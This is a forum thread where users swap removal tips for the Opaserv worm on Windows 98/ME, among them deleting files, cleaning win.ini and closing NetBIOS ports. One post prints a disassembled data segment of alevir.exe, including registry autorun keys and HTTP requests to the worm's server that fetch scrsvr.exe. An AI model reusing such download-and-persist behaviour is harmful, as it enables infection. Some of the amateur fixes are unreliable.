The virus spreads using netbios, remove file sharing from drive C. I tried the Microsoft password patch 273991USA8.exe without any success to avoid being attacked. A temporary fix could be to include these lines ind autoexec.bat : del c:\windows\alevir.exe del c:\windows\brasil.exe del c:\windows\scrsvr.exe The two others are just old versions of the same, and they also are beeing transfered to our windows. Keep an eye on network traffic with a TCP/IP protocol analyser aka wininternals TCPView PRO, look out for traffic generated by kernel32 Hopefully we will soon know more.

0

gram, I was one of the lucky ones who got the full blown effect of the Opaserv worm. I've had scrsvr.exe, brasil.pif, and then alevir.exe. Norton Anti-Virus would always detect it trying to run, but it could never keep my system clean from it. I followed all of their directions, downloaded all of their tools, kept my win.ini file clean, made dummy scrsvr.exe files, etc. And the stupid things kept coming back!!! I wrote Norton email after email, telling them that their anti-virus software isn't stopping the virus from getting on my computer. I sent them brasil.pif on October 21, and then finally, on October 25, they listed it as a threat, claiming it was discovered on October 25. Stupid liars. And all the while, the virus kept coming back. Eventually, I resorted to closing my ports 137-139 (Turning off NetBIOS), and my computer has not reported a virus for 3 days now. (It used to report every 15 minutes.) Before, From what I could tell, I could clean the viruses off my system using simple techniques such as removing the lines out of win.ini and my registry. I'd stay virus free until I'd connect to the internet, and then *bang* the viruses were back, sometimes in a new morphed form (brasil.pif or alevir.exe). It appears the virus uses a security flaw in Windows (I'm running win 98), by communicating to your computer through these ports, and by turning off ports 137-139, you fix it. I found a nice site that describes how to turn off these ports in detail, and it has simple to follow steps with handy screenshots. The site is here. https://grc.com/x/ne.dll?bh0bkyd2 https://grc.com/x/ne.dll?bh0bkyd2 Run the "Probe my Ports" test first for kicks, it should show you that your computer is vulnerable in the ports that this virus uses. Next, go to section 5 "Network bondage". That will describe how to turn off these ports. By the way, this shouldn't affect your computer's network connections at all. It just redistributes network commucation in the proper way, and you simply just close off ports 137-139 to those that shouldn't have access to it. Good luck!

0

Hi, I also detected Alevir.exe, Brasil.pif and scrsvr.exe on my Windows 98. I deleted the files and removed it from the anywhere I found it. (win.ini, autostart-entries, system.ini, Registry) I also found a little text-file named put.ini with a command-line to run the 3 files above, I deleted this file. Windows didn't want to delete alevir.exe, so I removed it from Linux. Everything seems to be clear now, I wonder which application installed this worm. I guess it must have been the Kazaa-Music-s--- and now I deactivated Kazaa, I simply renamed the directory and removed every starting entry from the windows-files. Robert

0

Along with the great advice above, I strongly advise getting a firewall like Zone Alarm. Just using FREE ZA (not ZA Plus or ZA Pro) I got these responses on grc.com: Test My Shields! "Your Internet port 139 does not appear to exist! One or more ports on this system are operating in FULL STEALTH MODE! Standard Internet behavior requires port connection attempts to be answered with a success or refusal response. Therefore, only an attempt to connect to a nonexistent computer results in no response of either kind. But YOUR computer has DELIBERATELY CHOSEN NOT TO RESPOND (that's very cool!) which represents advanced computer and port stealthing capabilities. A machine configured in this fashion is well hardened to Internet NetBIOS attack and intrusion. Unable to connect with NetBIOS to your computer. All attempts to get any information from your computer have FAILED. (This is very uncommon for a Windows networking-based PC.) Relative to vulnerabilities from Windows networking, this computer appears to be VERY SECURE since it is NOT exposing ANY of its internal NetBIOS networking protocol over the Internet." Probe My Ports! got this response on ALL 13 tries: "There is NO EVIDENCE WHATSOEVER that a port (or even any computer) exists at this IP address!" For a completely free program, I'm pretty happy so far. Oh and I'm blocking brasil, alevir and sersvr perfectly now, but they are still on my computer. I'll get rid of them soon. Thanks for all the info here.

0

i have similar virous

0

As we are seeing network device which is indicating data out. Disassembled code from that Alevir.exe below, which is showing some hard coded bytes, i.e. [ db 'Host: www.n3t.com.br.',0Dh,0Ah ] but there may be something new to us, it first trap itself (alevir.exe) as service routine, and download scrver.exe later on...........what else. who knows and who wants to knows? ================================================================ segment para public 'DATA' use32 assume cs:DATA ;org 405000h dd 7 ; DATA XREF: sub_4019AF+339r db 0 ; DATA XREF: start+2AAr ; sub_4019AF+3A3w db 'Alevir31415',0 ; DATA XREF: start+Bo db 'KERNEL32.dll',0 ; DATA XREF: start+29o db 'RegisterServiceProcess',0 ; DATA XREF: start+33o db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 ; DATA XREF: sub_4014A5+Eo db 'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0 ; DATA XREF: sub_4019AF+2Fo db 'Alevir',0 ; DATA XREF: sub_4014A5+4Ao ; sub_4014A5+C5o ... db 'AlevirOld',0 ; DATA XREF: sub_4014A5+3Do ; sub_4014A5+79o ... db 'ProxyEnable',0 ; DATA XREF: sub_4019AF+5Co db 'ProxyServer',0 ; DATA XREF: sub_4019AF+89o db '\Alevir.exe',0 ; DATA XREF: sub_4014A5+110o db 'Alevir.dat',0 ; DATA XREF: start+108o ; start+18Eo ... db 'AleSout.dat',0 ; DATA XREF: start+144o ; start+269o ... db 'puta!!.exe',0 ; DATA XREF: sub_4014A5+57o ; sub_4019AF+37Co db 'www.n3t.com.br.',0 ; DATA XREF: sub_4019AF+E5o db 'GET http://www.n3t.com.br/work/sscheduler.php?ver=01&task=newzad&first=' ; DATA XREF: sub_4019AF+23Ao db 30h ; DATA XREF: sub_4019AF+228w ; sub_4019AF+2B3w db ' HTTP/1.1',0Dh,0Ah db 'Host: www.n3t.com.br.',0Dh,0Ah db 0Dh,0Ah,0 db 'GET http://www.n3.com.br/wwwork/lastver HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_4019AF+318o db 'Host: www.n3t.com.br.',0Dh,0Ah db 0Dh,0Ah,0 db 'GET http://www.n3t.com.br/wwork/scrsvr.exe HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_4019AF+34Co db 'Host: www.opasoft.com',0Dh,0Ah db 0Dh,0Ah,0 db 'POST http://www.n3t.com.br/wwork/scheduler.php?ver=01&plain=' ; DATA XREF: sub_4019AF+19Fo db '0123456789ABCDEF&cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFF' ; DATA XREF: sub_4019AF+15Bo db 'FFFFFF&key=123456&res=0 HTTP/1.1',0Dh,0Ah db 'Host: www.n3t.com.br.',0Dh,0Ah db 0Dh,0Ah,0 db ' OK',0 ; DATA XREF: sub_4019AF+1B8o db 'PLAIN',0 ; DATA XREF: sub_4019AF+25Eo db 'CIPHER1',0 ; DATA XREF: sub_4019AF+278o db 'KEY',0 ; DATA XREF: sub_4019AF+28Eo db 3 dup(0FEh), 0Eh, 5 dup(0) ; DATA XREF: start+220o db 4 ; ; DATA XREF: sub_4022A1+198o db 'WINDOWS\alevir.exe',0 db 4 ; ; DATA XREF: sub_4022A1+1FDo ; sub_4022A1+3EDo db 'WINDOWS\win.ini',0 db 'c:\put.ini',0 ; DATA XREF: sub_4022A1+245o ; sub_4022A1+36Ao ... db 'c:\windows\alevir.exe',0 ; DATA XREF: sub_4022A1+38Eo ; sub_4022A1+3B7o db ',',0 ; DATA XREF: sub_4022A1+3A6o db 'windows',0 ; DATA XREF: sub_4022A1+37Co ; sub_4022A1+3D3o db 'run',0 ; DATA XREF: sub_4022A1+377o ; sub_4022A1+3CEo db 2 dup(0), 21h, 0, 1 db 'LOCALHOST X' ; DATA XREF: sub_4022A1+57o db 0FBh, 7Fh, 77h, 4Fh, 2 dup(0F9h), 0E3h, 3Fh, 0, 3, 5 dup(0) db 8 dup(0FFh), 0DFh, 0FDh, 0FFh, 3Fh, 1, 4 dup(0) ================================================================

0

je l'ai eu difficile de s'en débarrasser la solution peut passer par ouvrir window mode sans échec localiser le fichier alevir.exe dans windows et le supprimer simplement supprimer pour tout celà le partage des imprimante aller sur le site secuser.com j'espère que vous comprendrez mon français! bonne chance

0

does the scrsvr.exe,alevir.exe and/or brasil.pif or brasil.exe all combine as one.

0

autoexec.bat type it in the first lines del c:\windows\alevir.exe del c:\windows\brasil.exe del c:\windows\scrsvr.exe del c:\put.ini del also bulls--- in win.ini it seems this s--- was created in Sao paulo (brazil)..so if u`r bored run edit and see how is our worm .. it appears sao paulo alevirus opasoft -->what is opasoft? like microsoft?? is it brazilian version? haha ap...so if u r still bored : what is www.n3.com.br or www.opasoft.com or www.n3t.com --> all included!! in our worms

0

The way I did it was this. 1. Open regedit and do a search for "alevir", "brasil" and "scrsvr" and delete any refrences to them. 2. Edit win.ini and remove any refrence to them. 3. Reboot to DOS and delete these any of these files that you find in the windows directory. ALEVIR.exe BRASIL.* SCRSVR.* 4. Create fake files called ALEVIR.EXE, BRASIL.EXE, BRASIL.PIF & SCRSVR.exe and mark them all as read-only. 5. That should do it. If not, My next step would be to make copies of the fake files in another directory and just copy them back into the windows directory on every boot via autoexec so that if they ever do return, they are automatically written over with the fake files.

0

Got rid of alevir.exe by: Rebooting, hitting F8 and going into "Safe & Command Prompt" mode. Went from C:\ to C:\WINDOWS Then deleted by : C:\WINDOWS del alevir.exe and hit return (normal DOS delete) It DOESN'T SHOW any files deleted, but when you reboot, its gone. So, then, reboot. Then go to Start, Find, and delete the associated alevir file in APPLOG Clean WIN.INI of any references to alevir. N. Smith ------------ PS: McAfee Firewall will show you if it is really gone, as it is continuously trying to 'get out' if you are on line.

0

Anyone know if cmmpu.exe is a part of this? When I went to clean up win.ini, I saw this line: "Run=C:\WINDOWS\SYSTEM\cmmpu.exe,c:\windows\scrsvr.exe,c:\windows\Brasil.pif,c:\windows\Brasil.exe,c:\windows\alevir.exe" Is cmmpu a part of it, or was the other stuff just added to an already existing line, one I shouldn't delete?

0

I had to employ both matias loyola and matt huff's ideas to fix this for me. I added: del c:\windows\alevir.exe del c:\windows\brasil.exe del c:\windows\scrsvr.exe del c:\put.ini to the beginning of autoexec.bat, then rebooted. once the files were gone, i created the fake files by changing text files to .exe's, then put them where the other ones should be, and made them read only. This solved my problem perfectly, and put an end to my 6 hour struggle. Thank you for all your help guys :)

0

Found the file MACRO!.SCR may have been the source file that becomes ALEVIR.EXE, BRASIL.EXE, BRASIL.SCR and SCRSVR.exe. Since deleting this file from my computer booted in DOS mode, I have not received an infection notice from Norton Antivirus. Hope this helps. Thanks

0

Sorry for the misspelled file name. Should be MARCO!.SCR Thanks

0

Well finally have broken the virus down all you have to do is update definitions of nav2002 download fixopsvr 1.02(newly released on october 24).you can find this by searching for w32.opaserv.e.worm in google.com.Then follow the instructions given by symantec.download all the updates they tell then create text files c:\alevir.exe c:\brasil.pif c:\brasil.exe c:\scrsvr.exe and there is the solution for your problem guys

0

Hay, i had the same problem as you al. what i have dun, is the same as you all did. but it stil returns. is spot the ip adress of this virus, disable external ip adress 62.59.79.73 into you firewall greats Ruud www.autobedrijfkeizer.nl

0

For prevent infection you do all part explained in www.sarc.com, first with tools and second by hand. You must find out marco!.src and delete. Most important in binding TCP/IP for modem remove flag for shared files.

0

This is not very smart, but usefull, especially for non-specialists like me... Had same problems with OpaSoft. Removed it every now and then. Finally I made "my own" scrsvr-file! I simply wrote a small text file, renamed it to scrsvr.exe and set the writeprotection flag. The source is still somewhere on my disk, because at that very moment, when I delete my own Scrsvr-File, the bad one shows up. But at the moment, it works! Now I try the same with alevir.exe and brasil.pif /.exe Cheers Wolfgang

0

hi, i have had all of the viri listed above and was wondering if anyone ever tried making your WIN.INI read only? just a thought, you would prob. need to disable it when installing new hard/soft-ware. ps this forum has been a great wealth of info in this matter KUDOS to contributors and mods!!!!!

0

I tried everything to kill the germ: norton, fixop, manual delete... but it is still comming back finaly i found the solution BitDefender firewall THE CURE!!!!! I got it on: www.telecharger.com ----- antivirus you must find it on www.download.com

0

1. Make sure that your shared drives are hidden. How - you ask? When creating the share, name the share as C$ instead of C. 2. Right click on network neighbourhood. Modify properties on TCP/IP for Dialup Adapter. Ignore the caveat and ensure that "File and Print sharing" is UNTICKED in "Bindings" and save. 3. Delete any reference to the filenames in the registry and in "WIN.INI". Hope this works! Good luck.

0

Hy, I just found SCRSVR.exe on my PC end i did it this way. (I'm using ME, but i think it should even work on the other versions) First of all I started in the Secured Mode (Sorry I don't know, how it sounds in the English Version! German: "Abgesicherter Modus") Than I deleted alevir.exe brasil.pif brasil.exe scrsvr.exe and marco.exe (it appeard suddenly, befor I never saw it) That's just all! Since now it didn't appeard again!

0

Don't forget to delete PUT.INI in your root directory.

0

We are using Sygate Personal firewall (www.sygate.com free download) which in the traffic logs reports kernel32 trying to connect to 224.0.0.2 . If this succeeds we then get incoming data follwed by Norton picking up the virus file. We have disabled the firewall after disabling irdp/dhcp(www.homstead.com/tweakup/tweakup.html download) and are waiting to see if the virus returns. (Four hours on and still no virus)This really convinces us that this is the cause for the reinfection.Check your firewall logs for the above IP

0

Because nobody's linked this post to all the other opaserv threads on this site, I'll go ahead and copy an article I've put on all of the others. Here it is again: I was one of the lucky ones who got the full blown effect of the Opaserv worm. I had scrsvr.exe, brasil.pif, alevir.exe, and then marco!.scr. Norton Anti-Virus would always detect it trying to run, but it could never keep my system clean from it. I followed all of their directions, downloaded all of their tools, downloaded the patch from Microsoft, cleaned out my registry, kept my win.ini file clean, made dummy scrsvr.exe and brasil.pif files with the +r read attribute flag, etc. And the stupid things kept coming back!!! I wrote Norton email after email, telling them that their anti-virus software isn't stopping the virus from getting on my computer. I sent them brasil.pif on October 21, and then finally, on October 25, they listed it as a threat, claiming it was discovered on October 25. Stupid liars. And all the while, the virus kept coming back. Because of all of this, I feel that I have to resort to caps to make the following point =) IF YOU SIMPLY USE NORTON ANTIVIRUS AND DELETE CERTAIN FILES AND REGISTRY ENTRIES THE VIRUS CREATES, THE WORM WILL COME BACK! THE VIRUS USES TO USE PORTS 137-139 ON YOUR COMPUTER TO WORK. YOU MUST CLOSE THOSE PORTS! So, I resorted to closing my ports 137-139 (Turning off NetBIOS), and my computer has not reported a virus for 6 days now. (It used to report it every 15 minutes.) Before, from what I could tell, I could clean the viruses off my system using simple techniques such as removing the lines out of win.ini and my registry. I'd stay virus free until I'd connect to the internet, and then *bang* the viruses were back, sometimes in a new morphed form (brasil.pif or alevir.exe). It appears the virus uses a security flaw in Windows (I'm running win 98), by communicating to your computer through these ports, and by turning off ports 137-139, you fix it. I found a nice site that describes how to turn off these ports in detail, and it has simple to follow steps with handy screenshots. The site is here. https://grc.com/x/ne.dll?bh0bkyd2 Run the "Probe my Ports" test first for kicks, it should show you that your computer is vulnerable in the ports that this virus uses. Next, go to section 5 "Network bondage". That will describe how to turn off these ports. By the way, this shouldn't affect your computer's network connections at all. It just redistributes network commucation in the proper way, and you simply just close off ports 137-139 to those that shouldn't have access to it. Once you do this, the virus should be blocked from coming back every time you connect to the internet. By the way, make sure you also follow all of the tips listed on Symantec about the Opaserv worm. You must clean out your registry, win.ini file, and download the patch from Microsoft. If all of this was too technical for you, then another great solution is to download the free version of ZoneAlarm here: http://download.com.com/3000-2092-10153456.html?tag=lst-0-8 Another quick and easy solution is to just disable file and printer sharing. I've heard from others that did the trick (As for me and most others, I need file and printer sharing) And as for one last side note, it appears that you can't fully remove the virus, you can only suppress it. For example, my ports 137-139 were closed, and I hadn't had a virus report in 7 days as a result. I scanned for the opaserv virus using both of Norton's tools (NAV and FixOpsv.com), and it reported I was virus free. Then I decided to open the ports and connect to the internet to see what happened. *BAM* The virus was back in 5 minutes! And I was on a dialup dynamic IP address! That means the virus waits on the computer, just waiting for open ports and an internet connection. So I closed the ports, and immediately all virus activity stopped again. To sum up, by closing the ports off, you'll just suppress the virus for the rest of your computer's life. Good luck! Brad Peterson b_peterson@yahoo.com (email me if you have problems, I'd be happy to help)

0

Just an update from to the previous post. We've figured out all there is to know about Opaserv. You can find it here. This post contains the full fix for the Opaserv worm. It explains in detail how it works, and 3 methods you can use to stop it. http://www.computing.net/security/wwwboard/forum/3289.html Brad Peterson b_peterson@yahoo.com Feel free to email me if you need any help removing this virus.

0